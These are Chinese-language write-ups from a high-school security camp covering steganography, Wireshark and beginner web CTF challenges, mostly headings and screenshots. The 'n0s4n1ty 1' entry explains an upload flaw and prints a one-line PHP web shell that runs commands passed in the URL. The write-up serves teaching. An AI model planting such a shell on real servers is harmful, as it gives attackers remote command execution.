資安守門員-隱寫術 & Wireshark營隊

# 永平高中資安守門員-隱寫術 & Wireshark營隊 Write-ups # stegs ## So Meta Meta Data ![image](https://hackmd.io/_uploads/SJIP1IZyxx.png) ## St3g0 https://georgeom.net/StegOnline/upload ![image](https://hackmd.io/_uploads/ry3VRSZ1ll.png) ![image](https://hackmd.io/_uploads/BJV4CSZ1xx.png) ## Matryoshka doll ![image](https://hackmd.io/_uploads/HJebnNWkxe.png) ![image](https://hackmd.io/_uploads/S1X82V-1xx.png) ![image](https://hackmd.io/_uploads/Hy_1nN-kxx.png) # web & wireshark ## Packets Primer ![image](https://hackmd.io/_uploads/r1JuV7Zkgx.png) ## Wireshark doo dooo do doo... ``` tcp.stream eq n ``` ![image](https://hackmd.io/_uploads/HkbzuEZ1xx.png) ![image](https://hackmd.io/_uploads/rJiPuVWyex.png) 小陷阱，我們ROT時不包含數字 ## dont-use-client-side ![image](https://hackmd.io/_uploads/r1XuJGG1xx.png) ## Some Assembly Required 1 ![image](https://hackmd.io/_uploads/BJQSWfGyee.png) ## PcapPoisoning ![image](https://hackmd.io/_uploads/H1VXq4ZJle.png) ## n0s4n1ty 1 這題主要是上傳漏洞，攻擊者可以上傳一句話木馬的php檔案 ``` <?php system($_GET['cmd']); ?> ``` 上傳後找到位置，再透過網址列執行指令即可操作受害電腦先找到flag的位置，題目說再/root資料夾裡，便使用```ls ..```找尋資料夾位置，再把flag```cat```出來 ![image](https://hackmd.io/_uploads/BkAr1Ip6Jx.png) ![image](https://hackmd.io/_uploads/rywuy86Tke.png) ![image](https://hackmd.io/_uploads/HyU_xvpTyg.png) ## includes ![image](https://hackmd.io/_uploads/B107xZzkgg.png) ![image](https://hackmd.io/_uploads/S1qVebfJle.png) ## Insp3ct0r ![image](https://hackmd.io/_uploads/SyOpe-zJgx.png) ![image](https://hackmd.io/_uploads/SJMJb-G1xe.png) ![image](https://hackmd.io/_uploads/ryylWWGJxx.png) ## Inspect HTML ![image](https://hackmd.io/_uploads/BJFGW-fJex.png) ## Search source ![image](https://hackmd.io/_uploads/HkAI-Wf1lx.png) # others ## HideToSee ![image](https://hackmd.io/_uploads/HyLr4Ibyxl.png) ![image](https://hackmd.io/_uploads/SkSN4I-Jgg.png) ## hideme ![image](https://hackmd.io/_uploads/r11opEbkex.png) ![flag1](https://hackmd.io/_uploads/BJOLTVbkgx.png)